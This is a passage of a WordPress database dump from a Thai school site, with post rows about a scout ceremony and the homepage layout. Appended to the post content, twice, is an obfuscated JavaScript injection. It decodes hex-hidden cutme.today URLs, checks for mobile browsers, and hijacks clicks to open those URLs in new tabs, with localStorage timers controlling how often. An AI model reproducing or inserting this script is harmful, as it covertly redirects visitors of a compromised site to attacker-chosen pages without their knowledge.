os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','พิธีทบทวนคำปฏิญาณและสวนสนามลูกเสือ เนื่องในวันคล้ายวันสถาปนาคณะลูกเสือแห่งชาติประจำปี 2567','','inherit','closed','closed','','69-revision-v1','','','2024-07-27 11:03:48','2024-07-27 04:03:48','',69,'http://pakhaeng.ssk.in.th/?p=72',0,'revision','',0),
(73,1,'2024-07-27 11:04:36','2024-07-27 04:04:36','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":180},\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#0a71ad\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"73adeab7\",\"blockVersion\":4,\"display\":\"block\",\"typography\":{\"textAlign\":\"center\",\"fontSize\":\"20px\"},\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"20px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"20px\",\"marginBottom\":\"10px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#0693e3\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-73adeab7 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const 